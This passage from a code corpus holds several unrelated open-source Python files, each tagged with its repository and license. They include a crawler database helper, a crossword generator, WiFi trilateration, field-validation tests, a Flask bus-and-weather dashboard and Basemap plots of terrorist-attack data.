CREATE TABLE IF NOT EXISTS Websites(
wid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
url VARCHAR(256) NOT NULL UNIQUE,
title VARCHAR(100),
visited bit,
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
CTABLE_RULESETS = '''
CREATE TABLE IF NOT EXISTS Rulesets(
rid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
rules VARCHAR(512),
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
class DatabaseHelper(object):
def __init__(self):
        '''Create the tables.'''
self.conn = sqlite3.connect("./items.db")
if VERBOSE:
print 'Database connection OPEN.'
        # Domains table
        self.conn.execute(CTABLE_DOMAIN)
        # Websites table
        self.conn.execute(CTABLE_WEBSITE)
        # Rulesets table
self.conn.execute(CTABLE_RULESETS)
self.conn.commit()
if VERBOSE:
cur = self.conn.cursor()
print 'Tables:',cur.execute("SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
def close(self):
        '''Close the database connection.'''
if VERBOSE:
print 'Database connection CLOSE.'
self.conn.close()
def insertDomain(self, domain, indegree=0, outdegree=0):
        '''Insert a new domain.'''
        cur = self.conn.cursor()
        cur.execute("INSERT INTO Domains VALUES (NULL,?,?,?)", (domain, indegree, outdegree))
        # Commit to disk
self.conn.commit()
def insertRuleset(self, ruleset, domain):
        '''Insert a robots.txt ruleset for a domain.'''
        cur = self.conn.cursor()
        cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
        did = cur.fetchone()[0]
        cur.execute("INSERT INTO Rulesets VALUES (NULL,?,?)",(did, ruleset))
        # Commit to disk
self.conn.commit()
def insertWebsite(self, url, domain):
        '''Insert a web page, mark it as unvisited, and increase the in-degree of its domain.'''
cur = self.conn.cursor()
cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
result = cur.fetchone()
if not result:
            # No record for this domain yet: create it with in-degree 1
if VERBOSE:
print 'Spot Domain:',domain
self.insertDomain(domain, indegree=1)
cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
did = cur.fetchone()[0]
else:
did = result[0]
            # The domain record already exists: increase its in-degree
            cur.execute("UPDATE Domains SET indegree=indegree+1 WHERE domain=?", (domain,))
cur.execute("INSERT INTO Websites VALUES (NULL,?,?,NULL,0)", (did, url,))
# 写入到文件
self.conn.commit()
def updateInfo(self, item, newlinks, oldlinks):
'''爬虫爬完之后对数据库内容进行更新'''
cur = self.conn.cursor()
cur.execute("SELECT wid,did FROM Websites WHERE url=?", (item['url'],))
wid, did = cur.fetchone()
        # Update the website record
        cur.execute("UPDATE Websites SET title=?,visited=1 WHERE wid=?", (item['title'], wid,))
        # The out-degree of the corresponding domain also needs to be updated
        cur.execute("UPDATE Domains SET outdegree=outdegree+? WHERE did=?", (len(item['links']), did,))
        # Update the records for every link found on this page
        # Links the caller marked as not seen before
for link,domain in newlinks:
self.insertWebsite(link, domain)
        # Links the caller marked as already seen
        for link,domain in oldlinks:
            # Increase the in-degree of the corresponding domain record
            cur.execute("UPDATE Domains SET indegree=indegree+1 WHERE domain=?", (domain,))
        # Commit to disk
self.conn.commit()
def robotsrulesetOfDomain(self, domain):
        '''Check whether the domain is already in the database.
        No  --> (False, None)
        Yes --> (True, the robots.txt rules stored in the database)
        '''
exist = False
cur = self.conn.cursor()
        # Does the domain exist?
        cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
        if cur.fetchone() :
            exist = True
        # If it exists, fetch the stored ruleset
cur.execute("SELECT rules FROM Domains,Rulesets "
"WHERE domain=? AND Domains.did=Rulesets.did"
,(domain,) )
ruleset = cur.fetchone()
return (exist, ruleset)
def rollback(self):
self.conn.rollback()
def showAll(self):
self.conn.commit()
cur = self.conn.cursor()
cur.execute("SELECT * FROM Domains")
print cur.fetchall()
cur.execute("SELECT * FROM Websites")
print cur.fetchall()
_dbcli = None
def getCliInstance():
global _dbcli
if not _dbcli:
_dbcli = DatabaseHelper()
return _dbcli
def test():
dbcli = getCliInstance()
# dbcli.insertDomain('jaysonhwang.com')
# dbcli.insertRuleset('test','jaysonhwang.com')
print dbcli.robotsrulesetOfDomain('www.zol.com')
print dbcli.robotsrulesetOfDomain('jayson.com')
dbcli.showAll()
dbcli.close()
if __name__ == '__main__':
test()
| JaySon-Huang/WebModel | WebModel/database/databasehelper.py | Python | mit | 4,676 |
# coding: utf-8
import re
from crossword import *
class Crossword2(Crossword):
def __init__(self):
self.grid = OpenGrid()
self.connected = {}
self.used_words = []
def copy(self):
copied = Crossword2()
copied.grid = self.grid.copy()
copied.connected = self.connected.copy()
copied.used_words = self.used_words[:]
return copied
def embed(self, pos, direction, word):
assert word not in self.used_words
super(Crossword2, self).embed(pos, direction, word)
self.used_words.append(word)
def all_disconnected_sequences(self):
'''
>>> c = Crossword2()
>>> c.embed((0, 0), HORIZONTAL, 'ANT')
>>> c.embed((0, 0), VERTICAL, 'ATOM')
>>> c.embed((1, 2), HORIZONTAL, 'IT')
>>> c.embed((3, 0), HORIZONTAL, 'MEET')
>>> c.dump()
_#____
#ANT#_
_T#IT#
_O____
#MEET#
_#____
>>> c.all_disconnected_sequences()
[((0, 2), 2, 'T'), ((1, 0), 2, 'T'), ((2, 0), 2, 'O'), ((0, 1), 1, 'N'), ((3, 1), 1, 'E'), ((0, 2), 1, 'TI'), ((0, 2), 1, 'TI.E'), ((3, 2), 1, 'E'), ((1, 3), 1, 'T'), ((1, 3), 1, 'T.T'), ((3, 3), 1, 'T')]
'''
sequences = []
for pos, direction, length in [((r, self.grid.colmin), HORIZONTAL, self.grid.width) for r in range(self.grid.rowmin, self.grid.rowmax + 1)] + [((self.grid.rowmin, c), VERTICAL, self.grid.height) for c in range(self.grid.colmin, self.grid.colmax + 1)]:
line = self.grid.get_word(pos, direction, length)
poslist = self.grid.poslist(pos, direction, length)
sequences += self.extract_sequences(line, poslist, direction)
return [(p, d, w) for (p, d, w) in sequences if not w.endswith('.')]
def extract_sequences(self, line, poslist, direction, idx=0, current_seq=None):
'''
>>> c = Crossword2()
>>> c.extract_sequences('ABC', [(0, 0), (0, 1), (0, 2)], HORIZONTAL)
[((0, 0), 2, 'ABC')]
>>> c.extract_sequences('_A_', [(0, 0), (0, 1), (0, 2)], HORIZONTAL)
[((0, 1), 2, 'A'), ((0, 1), 2, 'A.')]
>>> c.extract_sequences('A_C', [(0, 0), (0, 1), (0, 2)], HORIZONTAL)
[((0, 0), 2, 'A'), ((0, 0), 2, 'A.C'), ((0, 2), 2, 'C')]
>>> c.extract_sequences('A#C', [(0, 0), (0, 1), (0, 2)], HORIZONTAL)
[((0, 0), 2, 'A'), ((0, 2), 2, 'C')]
>>> c.extract_sequences('A_#B_C', [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0,5)], HORIZONTAL)
[((0, 0), 2, 'A'), ((0, 0), 2, 'A.'), ((0, 3), 2, 'B'), ((0, 3), 2, 'B.C'), ((0, 5), 2, 'C')]
>>> c.extract_sequences('A_B__C', [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0,5)], HORIZONTAL)
[((0, 0), 2, 'A'), ((0, 0), 2, 'A.B'), ((0, 2), 2, 'B'), ((0, 0), 2, 'A.B.'), ((0, 2), 2, 'B.'), ((0, 0), 2, 'A.B..C'), ((0, 2), 2, 'B..C'), ((0, 5), 2, 'C')]
'''
if not current_seq: current_seq = []
if idx >= len(line): return current_seq
c = line[idx]
pos = poslist[idx]
if c == FILLED:
return current_seq + self.extract_sequences(line, poslist, direction, idx + 1, [])
if c == EMPTY:
new_current_seq = [(p, d, s + '.') for (p, d, s) in current_seq]
return current_seq + self.extract_sequences(line, poslist, direction, idx + 1, new_current_seq)
if current_seq:
new_current_seq = [(p, d, s + c) for (p, d, s) in current_seq if not self.is_connected(poslist[idx - 1], pos)]
if any([s.endswith('.') for (p, d, s) in current_seq]):
new_current_seq.append((pos, direction, c))
return self.extract_sequences(line, poslist, direction, idx + 1, new_current_seq)
else:
new_current_seq = [(pos, direction, c)]
return self.extract_sequences(line, poslist, direction, idx + 1, new_current_seq)
def build_crossword2(words, monitor=False):
'''
>>> ans = list(build_crossword2(['ANT', 'ART', 'RAT']))
>>> ans[0].dump()
#ANT#
>>> ans[1].dump()
_#___
#ANT#
_R___
_T___
_#___
>>> ans[2].dump()
___#___
__#ANT#
___R___
#RAT#__
___#___
>>> ans[3].dump()
___#_
___R_
_#_A_
#ANT#
_R_#_
_T___
_#___
>>> ans[4].dump()
_#___
_R___
#ANT#
_T___
_#___
>>> ans[5].dump()
___#_
_#_A_
_R_R_
#ANT#
_T_#_
_#___
>>> ans[6].dump()
___#___
___R___
__#ANT#
#ART#__
___#___
>>> ans[7].dump()
___#_
___A_
___R_
#ANT#
___#_
>>> ans[8].dump()
___#__
_#RAT#
___R__
#ANT#_
___#__
>>> ans[9].dump()
___#_
_#_A_
_R_R_
#ANT#
_T_#_
_#___
>>> ans[10].dump()
___#___
___A___
__#RAT#
#ANT#__
___#___
>>> ans[11].dump()
___#_
___R_
___A_
#ANT#
___#_
>>> ans[12].dump()
___#__
_#ART#
___A__
#ANT#_
___#__
>>> ans[13].dump()
___#___
___R___
__#ART#
#ANT#__
___#___
>>> ans[14].dump()
___#_
___R_
_#_A_
#ANT#
_R_#_
_T___
_#___
>>> len(ans)
15
'''
crosswords = [Crossword2()]
crosswords[0].embed((0, 0), HORIZONTAL, words[0])
while True:
if not crosswords: break
crosswords = sorted(crosswords, key=lambda c: evaluate_crossword(c))
base = crosswords.pop(0)
if monitor:
print ('%d candidates...'%(len(crosswords)))
if isinstance(monitor, dict):
base.dump(empty=monitor['EMPTY'], filled=monitor['FILLED'])
else:
base.dump()
print ('')
try:
sequences = base.all_disconnected_sequences()
if is_valid_crossword(sequences):
yield base
candidates = generate_candidates(words, base, sequences)
crosswords += candidates
except ValueError:
# discard this base
pass
def is_valid_crossword(sequences):
return all([len(s) <= 1 or s.find('.') > -1 for _, _, s in sequences])
def generate_candidates(words, base, sequences):
fit_words = []
for sequence in sequences:
available_words = [w for w in words if w not in base.used_words]
fit_words_for_seq = [(p, d, w) for (p, d, w) in propose_words(sequence, available_words) if base.is_fit(p, d, w)]
_, _, s = sequence
if not fit_words_for_seq and len(s) > 1 and s.find('.') == -1:
# dead end; discard this base
raise ValueError('no candidates found')
fit_words += fit_words_for_seq
candidates = []
for p, d, w in fit_words:
copy = base.copy()
copy.embed(p, d, w)
candidates.append(copy)
return candidates
def propose_words(sequence, words):
(p, d, seq) = sequence
proposed_words = []
for word in words:
idx = 0
while True:
m = re.search(seq, word[idx:])
if not m: break
proposed_words.append((OpenGrid.pos_inc(p, -(m.start() + idx), d), d, word))
idx += m.start() + 1
return proposed_words
def evaluate_crossword(c):
# return -len(c.used_words)
return (c.grid.width + c.grid.height) * 1.0 / len(c.used_words) ** 2
# return (c.grid.width * c.grid.height) * 1.0 / sum([len(w) for w in c.used_words])
def pickup_crosswords(words, dump_option=None, monitor=False):
best = 9999
for c in build_crossword2(words, monitor=monitor):
if evaluate_crossword(c) < best:
if dump_option:
c.dump(empty=dump_option['EMPTY'], filled=dump_option['FILLED'])
else:
c.dump()
best = evaluate_crossword(c)
print ('score: %f'%(best))
print ('')
if __name__ == '__main__':
import doctest
doctest.testmod()
| yattom/crossword | crossword2.py | Python | mit | 7,931 |
import math
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def rssToEstimatedDistance(rss):
freq = 2462 # freq of WiFi channel 6
origDBm = -20 # estimate this value
loss = abs(origDBm - rss)
dist = 10 ** ( ( loss + 27.55 - 20 * math.log10(freq) ) / 20 )
return dist
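# Worked example: with origDBm = -20 and a measured rss of -60 dBm,
# loss = 40 dB and dist = 10**((40 + 27.55 - 20*log10(2462))/20),
# roughly 0.97 m under this free-space path-loss model (f in MHz, d in m).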
def trilaterate(inSources, rss):
distances = []
distances.append( rssToEstimatedDistance(rss[0]) )
distances.append( rssToEstimatedDistance(rss[1]) )
distances.append( rssToEstimatedDistance(rss[2]) )
# find the three intersection points
tp1 = _findEqualPerp(inSources[0], inSources[1], distances[0], distances[1])
tp2 = _findEqualPerp(inSources[0], inSources[2], distances[0], distances[2])
tp3 = _findEqualPerp(inSources[1], inSources[2], distances[1], distances[2])
p = Point( (tp1.x + tp2.x + tp3.x) / 3, (tp1.y + tp2.y + tp3.y) / 3 )
return p
def _findEqualPerp(p1, p2, r1, r2):
    # swap points if p2 is behind p1
if p2.x < p1.x:
temp = p2
p2 = p1
p1 = temp
# compute the equation for the line
deltaX = p2.x - p1.x
deltaY = p2.y - p1.y
if deltaX == 0:
slope = 999999999
else:
slope = deltaY / deltaX
intercept = p2.y - slope * p2.x
# compute the constant multiplier
lineLen = math.sqrt((p2.x - p1.x)**2 + (p2.y - p1.y)**2)
c = lineLen / (r1 + r2)
posOnLine = c * r1
angle = math.atan(slope)
touchingPoint = Point(math.cos(angle) * posOnLine + p1.x, math.sin(angle) * posOnLine + p1.y)
return touchingPoint
# test program
def main():
a = Point(1, 6)
b = Point(2, 3)
c = Point(5, 7)
t = trilaterate([a,b,c], [2,3,5])
print(t.x)
print(t.y)
if __name__ == '__main__':
main()
| DepthDeluxe/dot11sniffer | app/Trilateration_Colin.py | Python | mit | 1,799 |
import pytest
from swimlane.exceptions import ValidationError
def test_getattr_fallback(mock_record):
"""Verify cursor __getattr__ falls back to AttributeError for unknown cursor + list methods"""
with pytest.raises(AttributeError):
getattr(mock_record['Text List'], 'unknown_method')
def test_set_validation(mock_record):
"""Test directly setting a ListField value for validation"""
mock_record['Text List'] = ['text']
with pytest.raises(ValidationError):
mock_record['Text List'] = [123]
with pytest.raises(ValidationError):
mock_record['Text List'] = 123
with pytest.raises(ValidationError):
mock_record['Text List'] = 'text'
def test_modification_validation(mock_record):
"""Test calling list methods on cursor respects validation"""
mock_record['Text List'].append('text')
with pytest.raises(ValidationError):
mock_record['Text List'].append(123)
def test_numeric_range(mock_record):
"""Test item numeric range restrictions"""
key = 'Numeric List Range Limit'
mock_record[key] = [5]
with pytest.raises(ValidationError):
mock_record[key] = [3]
with pytest.raises(ValidationError):
mock_record[key] = [12]
def test_list_length_validation(mock_record):
"""List length validation check"""
key = 'Numeric List Range Limit'
mock_record[key] = [5, 6, 7]
with pytest.raises(ValidationError):
mock_record[key].append(8)
with pytest.raises(ValidationError):
mock_record[key] = []
def test_item_type_validation(mock_record):
"""Validate correct item type for text/numeric values"""
key = 'Numeric List Range Limit'
with pytest.raises(ValidationError):
mock_record[key] = ['text']
def test_min_max_word_validation(mock_record):
"""Validate against min/max word restrictions"""
key = 'Text List Word Limit'
with pytest.raises(ValidationError):
mock_record[key] = ['word ' * 10]
with pytest.raises(ValidationError):
mock_record[key] = ['word']
def test_min_max_char_validation(mock_record):
"""Min/max characters restriction validation"""
key = 'Text List Char Limit'
with pytest.raises(ValidationError):
mock_record[key] = ['defg', 'hijkl', 'mno pqr']
with pytest.raises(ValidationError):
mock_record[key] = ['']
def test_list_field_bulk_modify_value(mock_record):
"""Pass-through bulk_modify value"""
value = ['Test', 'Value']
assert mock_record.get_field('Text List').get_bulk_modify(value) == value
| Swimlane/sw-python-client | tests/fields/test_list.py | Python | mit | 2,579 |
callback_functions = ["collision_enter", "collision_stay", "collision_exit"]
length_area_world = 75
raise_exception = False
# import all required modules
from game import *
from gameobject import *
from contracts import *
from configuration import *
from component import *
from loader import *
from physics import *
from scene import *
from timeutils import *
from builtincomponents import *
from builtincomponents.camera import *
from builtincomponents.collider import *
from builtincomponents.sprite_renderer import *
from builtincomponents.transform import *
| temdisponivel/temdisponivellib_pygame | temdisponivellib/__init__.py | Python | mit | 564 |
from functools import reduce
# constants used in the multGF2 function
mask1 = mask2 = polyred = None
def setGF2(degree, irPoly):
"""Define parameters of binary finite field GF(2^m)/g(x)
- degree: extension degree of binary field
- irPoly: coefficients of irreducible polynomial g(x)
"""
def i2P(sInt):
"""Convert an integer into a polynomial"""
return [(sInt >> i) & 1
for i in reversed(range(sInt.bit_length()))]
global mask1, mask2, polyred
mask1 = mask2 = 1 << degree
mask2 -= 1
polyred = reduce(lambda x, y: (x << 1) + y, i2P(irPoly)[1:])
def multGF2(p1, p2):
"""Multiply two polynomials in GF(2^m)/g(x)"""
p = 0
while p2:
if p2 & 1:
p ^= p1
p1 <<= 1
if p1 & mask1:
p1 ^= polyred
p2 >>= 1
return p & mask2
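# Worked example: in GF(2^3) with g(x) = x^3 + x + 1, calling setGF2(3, 0b1011)
# and then multGF2(0b111, 0b101) returns 0b110, i.e.
# (x^2 + x + 1)(x^2 + 1) = x^4 + x^3 + x + 1, which reduces to x^2 + x
# modulo x^3 + x + 1.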
if __name__ == "__main__":
    # Define binary field GF(2^127)/x^127 + x^63 + 1
    setGF2(127, 2**127 + 2**63 + 1)
    # Evaluate the product of two elements of GF(2^127)
    print("{:02x}".format(multGF2(0x3f7e0000000000000000000000000000, 0x3f7e00000000000000000000)))
| srijs/hwsl2-core | calc.py | Python | mit | 1,141 |
# -*- coding: utf8 -*-
from __future__ import unicode_literals
import unittest
import os
import sys
from flake8.api import legacy as engine
if sys.version_info[0] == 3:
unicode = str
if sys.version_info[:2] == (2, 6):
# Monkeypatch to make tests work on 2.6
def assert_less(first, second, msg=None):
assert first > second
unittest.TestCase.assertLess = assert_less
class TestCodeComplexity(unittest.TestCase):
def test_flake8_conformance(self):
flake8style = engine.get_style_guide(
ignore=['E501'],
max_complexity=6
)
directory = 'flask_rollbar'
self.assertEqual(os.path.isdir(directory), True,
"Invalid test directory '%s'. You need to update test_flake8.py" % directory)
# Get all the files to check
files = []
for dirpath, dirnames, filenames in os.walk(directory):
for filename in [f for f in filenames if f.endswith(".py")]:
files += [os.path.join(dirpath, filename)]
result = flake8style.check_files(files)
self.assertEqual(result.total_errors, 0,
"Code found to be too complex or failing PEP8")
if __name__ == '__main__':
unittest.main()
| psykzz/flask-rollbar | tests/test_flake8.py | Python | mit | 1,281 |
import pyak
import yikbot
import time
# Latitude and Longitude of location where bot should be localized
yLocation = pyak.Location("42.270340", "-83.742224")
yb = yikbot.YikBot("yikBot", yLocation)
print "DEBUG: Registered yikBot with handle %s and id %s" % (yb.handle, yb.id)
print "DEBUG: Going to sleep, new yakkers must wait ~90 seconds before they can act"
time.sleep(90)
print "DEBUG: yikBot instance 90 seconds after initialization"
print vars(yb)
yb.boot()
| congrieb/yikBot | start.py | Python | mit | 469 |
import prosper.datareader.exceptions
import prosper.datareader._version
| EVEprosper/ProsperDatareader | prosper/datareader/__init__.py | Python | mit | 72 |
"""
Visualization module.
"""
import numpy as np
from matplotlib import animation
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes
from mpl_toolkits.axes_grid1.inset_locator import mark_inset
from pca import create_handles
import warnings
warnings.filterwarnings('ignore')
def get_temp_markers(year, attacks):
"""
Gives all the information about the markers needed for the
    year passed as argument.
"""
data_given_year = attacks[attacks['Year'] == year].reset_index()
num_markers = data_given_year.shape[0]
markers = np.zeros(num_markers, dtype=[('Longitude', float, 1),
('Latitude', float, 1),
('Size', float, 1),
('Color', float, 1)])
killed = data_given_year['Killed']
_MIN, _MAX, _MEDIAN = killed.min(), killed.max(), killed.median()
markers['Longitude'] = data_given_year['Longitude']
markers['Latitude'] = data_given_year['Latitude']
markers['Size'] = 10* np.abs(killed - _MEDIAN) + 1
markers['Color'] = (killed - _MIN)/(_MAX - _MIN)
return markers, _MAX
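# For example: if a year's 'Killed' values were [0, 2, 10], the median is 2,
# so the marker sizes become [21, 1, 81] and the colours [0.0, 0.2, 1.0]
# before being mapped through the colormap.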
def world_view(attacks):
"""
    Creates an animation showing the evolution of worldwide terrorist attacks
    over the available years.
"""
fig = plt.figure(figsize=(10, 10))
cmap = plt.get_cmap('inferno')
# create the map
map = Basemap(projection='cyl')
map.drawmapboundary()
map.fillcontinents(color='lightgray', zorder=0)
# define the frame values (as 1993 is not contained in the database
# we have to remove it, otherwise we will have an empty frame)
frames = np.append(np.arange(1970, 1993), np.arange(1994, 2017))
# create the plot structure
temp_markers, _MAX = get_temp_markers(frames[0], attacks)
xs, ys = map(temp_markers['Longitude'], temp_markers['Latitude'])
scat = map.scatter(xs, ys, s=temp_markers['Size'], c=temp_markers['Color'], cmap=cmap, marker='o',
alpha=0.3, zorder=10)
year_text = plt.text(-170, 80, str(frames[0]),fontsize=15)
cbar = map.colorbar(scat, location='bottom')
cbar.set_label('number of killed people 0.0 = min [0] 1.0 = max [{}]' .format(_MAX))
plt.title('Activity of terrorism attacks from 1970 to 2016')
plt.savefig('world_view.pdf', bbox_inches='tight')
plt.show()
def update(year):
"""
Updates the content of each frame during the animation for
the year passed in argument.
"""
# retrieve necessary information from the markers
temp_markers, _MAX = get_temp_markers(year, attacks)
# update the map content
xs, ys = map(temp_markers['Longitude'], temp_markers['Latitude'])
scat.set_offsets(np.hstack((xs[:,np.newaxis], ys[:, np.newaxis])))
scat.set_color(cmap(temp_markers['Color']))
scat.set_sizes(temp_markers['Size'])
year_text.set_text(str(year))
cbar.set_label('number of killed people 0.0 = min [0] 1.0 = max [{}]' .format(_MAX))
return scat,
# create animation
ani = animation.FuncAnimation(fig, update, interval=1000, frames=frames, blit=True)
ani.save('visualization.mp4', writer = 'ffmpeg', fps=1, bitrate=-1)
plt.show()
def get_group_markers(attacks, group):
"""
Gives all the information about the markers for the
group passed in argument.
"""
data_given_group = attacks[attacks['Group'] == group]
num_markers = data_given_group.shape[0]
markers = np.zeros(num_markers, dtype=[('Longitude', float, 1),
('Latitude', float, 1),
('Size', float, 1),
('Color', float, 1)])
killed = data_given_group['Killed']
_MIN, _MAX, _MEDIAN = killed.min(), killed.max(), killed.median()
markers['Longitude'] = data_given_group['Longitude']
markers['Latitude'] = data_given_group['Latitude']
markers['Size'] = 10* np.abs(killed - _MEDIAN) + 1
markers['Color'] = (killed - _MIN)/(_MAX - _MIN)
return markers, _MAX
def zoom_taliban_intensity(attacks):
"""
    Zooms in on the locations of the attacks perpetrated by the Taliban group,
showing the intensity of the attacks.
"""
fig = plt.figure(figsize=(15,15))
ax = fig.add_subplot(111)
cmap = plt.get_cmap('inferno')
plt.title('Intensity of attacks perpetrated by the Taliban group\n')
# create the map
map = Basemap(projection='cyl',lat_0=0, lon_0=0)
map.drawmapboundary()
map.fillcontinents(color='lightgray', zorder=0)
# create the plot structure
temp_markers, _MAX = get_group_markers(attacks, 'Taliban')
xs, ys = map(temp_markers['Longitude'], temp_markers['Latitude'])
scat = map.scatter(xs, ys, s=temp_markers['Size'], c=temp_markers['Color'], cmap=cmap, marker='o',
alpha=0.3, zorder=10)
axins = zoomed_inset_axes(ax, 9, loc=2)
axins.set_xlim(25, 40)
axins.set_ylim(60, 75)
plt.xticks(visible=False)
plt.yticks(visible=False)
map2 = Basemap(llcrnrlon=55,llcrnrlat=25,urcrnrlon=75,urcrnrlat=40, ax=axins)
map2.drawmapboundary()
map2.fillcontinents(color='lightgray', zorder=0)
map2.drawcoastlines()
map2.drawcountries()
map2.scatter(xs, ys, s=temp_markers['Size']/5., c=cmap(temp_markers['Color']), alpha=0.5)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
plt.savefig('taliban_zoom_intensity.pdf', bbox_inches='tight')
plt.show()
def get_group_attack_types_markers(attacks, group):
"""
Gives the description of the attack types about the markers for the
group passed in argument.
"""
data_given_year = attacks[attacks['Group'] == group]
list_attack_type_unique = data_given_year['Attack_type'].unique().tolist()
list_attack_type = data_given_year['Attack_type'].tolist()
# assign each attack to the corresponding color
colors_attack_type = plt.cm.tab20(list(range(1,len(list_attack_type_unique)+1)))
label_color_dict_attack_type = dict(zip(list_attack_type_unique, colors_attack_type))
cvec_attack_type = [label_color_dict_attack_type[label] for label in list_attack_type]
num_markers = data_given_year.shape[0]
markers = np.zeros(num_markers, dtype=[('Longitude', float, 1),
('Latitude', float, 1),
('Size', float, 1),
('Color', float, 4)])
killed = data_given_year['Killed']
_MIN, _MAX, _MEDIAN = killed.min(), killed.max(), killed.median()
markers['Longitude'] = data_given_year['Longitude']
markers['Latitude'] = data_given_year['Latitude']
markers['Size'] = 100
markers['Color'] = np.array(cvec_attack_type)
return markers, label_color_dict_attack_type
def zoom_taliban_attack_types(attacks):
"""
    Zooms in on the locations of the attacks perpetrated by the Taliban group,
showing the different attack types.
"""
group = 'Taliban'
fig = plt.figure(figsize=(15,15))
ax = fig.add_subplot(111)
cmap = plt.get_cmap('inferno')
plt.title('Attack types perpetrated by the Taliban group\n')
# create the map
map = Basemap(projection='cyl',lat_0=0, lon_0=0)
map.drawmapboundary()
map.fillcontinents(color='lightgray', zorder=0)
# create the plot structure
temp_markers, _MAX = get_group_markers(attacks, group)
xs, ys = map(temp_markers['Longitude'], temp_markers['Latitude'])
scat = map.scatter(xs, ys, s=temp_markers['Size'], c=temp_markers['Color'], cmap=cmap, marker='o',
alpha=0.5, zorder=10)
axins = zoomed_inset_axes(ax, 9, loc=2)
axins.set_xlim(25, 40)
axins.set_ylim(60, 75)
plt.xticks(visible=False)
plt.yticks(visible=False)
map2 = Basemap(llcrnrlon=55,llcrnrlat=25,urcrnrlon=75,urcrnrlat=40, ax=axins)
map2.drawmapboundary()
map2.fillcontinents(color='lightgray', zorder=0)
map2.drawcoastlines()
map2.drawcountries()
temp_markers, label_color_dict_attack_type = get_group_attack_types_markers(attacks, group)
map2.scatter(xs, ys, s=temp_markers['Size']/5., c=temp_markers['Color'], alpha=0.5)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
handles = create_handles(label_color_dict_attack_type, ax)
labels = [h.get_label() for h in handles]
ax.legend(loc='upper left', bbox_to_anchor=(1, 1), handles=handles, labels=labels)
plt.savefig('taliban_zoom_attack_types.pdf', bbox_inches='tight')
plt.show()
| mdeff/ntds_2017 | projects/reports/terrorist_attacks/project/visualization.py | Python | mit | 8,333 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Ricardo Ribeiro"
__credits__ = ["Ricardo Ribeiro"]
__license__ = "MIT"
__version__ = "0.0"
__maintainer__ = "Ricardo Ribeiro"
__email__ = "[email protected]"
__status__ = "Development"
import time
from datetime import datetime, timedelta
def timeit(method):
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
te = time.time()
time_elapsed = datetime(1,1,1) + timedelta(seconds=(te-ts) )
print("%s: %d:%d:%d:%d;%d" % (method.__name__, time_elapsed.day-1, time_elapsed.hour, time_elapsed.minute, time_elapsed.second, time_elapsed.microsecond))
return result
    return timed
| sunj1/my_pyforms | pyforms/Utils/timeit.py | Python | mit | 694 |
from app.app_and_db import app
from flask import Blueprint, jsonify, render_template
import datetime
import random
import requests
dashboard = Blueprint('dashboard', __name__)
cumtd_endpoint = 'https://developer.cumtd.com/api/{0}/{1}/{2}'
cumtd_endpoint = cumtd_endpoint.format('v2.2', 'json', 'GetDeparturesByStop')
wunderground_endpoint = 'http://api.wunderground.com/api/{0}/hourly/q/{1}/{2}.json'
wunderground_endpoint = wunderground_endpoint.format(app.config['WUNDERGROUND_API_KEY'], 'IL', 'Champaign')
@dashboard.route('/')
def index():
time=datetime.datetime.now().time().strftime('%I:%M').lstrip('0')
return render_template('pages/dashboard.html', image_number=random.randrange(1, 9), time=time)
#Query no more than once a minute
@dashboard.route('/bus')
def bus_schedule():
params = {'key' : app.config['CUMTD_API_KEY'],
'stop_id' : 'GRN4TH',
'count' : '5'}
response = requests.get(cumtd_endpoint, params=params)
json = response.json()
departures = []
for departure in json['departures'] :
if departure['trip']['direction'] == 'East':
departures.append(departure)
return jsonify(departures=departures)
#Query no more than once every three minutes
@dashboard.route('/weather')
def weather():
response = requests.get(wunderground_endpoint)
json = response.json()
return jsonify(json)
app.register_blueprint(dashboard, url_prefix='/dashboard')
| nickofbh/kort2 | app/dashboard/views.py | Python | mit | 1,414 |
from __future__ import print_function
import sys
sys.path.append('..') # help python find cyton.py relative to scripts folder
from openbci import cyton as bci
import logging
import time
def printData(sample):
# os.system('clear')
print("----------------")
print("%f" % (sample.id))
print(sample.channel_data)
print(sample.aux_data)
print("----------------")
if __name__ == '__main__':
# port = '/dev/tty.OpenBCI-DN008VTF'
port = '/dev/tty.usbserial-DB00JAM0'
# port = '/dev/tty.OpenBCI-DN0096XA'
baud = 115200
logging.basicConfig(filename="test.log", format='%(asctime)s - %(levelname)s : %(message)s', level=logging.DEBUG)
logging.info('---------LOG START-------------')
board = bci.OpenBCICyton(port=port, scaled_output=False, log=True)
print("Board Instantiated")
board.ser.write('v')
time.sleep(10)
board.start_streaming(printData)
board.print_bytes_in()
| OpenBCI/OpenBCI_Python | scripts/test.py | Python | mit | 937 |
__author__ = 'mengpeng'
import os
from unittest import TestCase
from pycrawler.scraper import DefaultScraper
from pycrawler.handler import Handler
from pycrawler.utils.tools import gethash
from test_scraper import SpiderTest
class TestTempHandler(TestCase):
def test_setargs(self):
h = Handler.get('TempHandler')(SpiderTest('testspider'))
self.assertEqual('./tmp/testspider/', h.args['path'])
args = {'path': './newpath/'}
h.setargs(args)
self.assertEqual('./newpath/testspider/', h.args['path'])
def test_parse(self):
h = Handler.get('TempHandler')(SpiderTest('testspider'))
h.parse('conent', 'testurl1')
self.assertTrue(os.path.exists(h._tmpfilename('testurl1')))
def test__tmpfilename(self):
h = Handler.get('TempHandler')(SpiderTest('testspider'))
self.assertEqual('./tmp/testspider/' + str(gethash('sample')) + '.html', h._tmpfilename('sample'))
        self.assertTrue(os.path.exists('./tmp/'))
| ymero/PyCrawler | test/test_handler.py | Python | mit | 996 |
import datetime
def suffix(d):
return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
def custom_strftime(format, t):
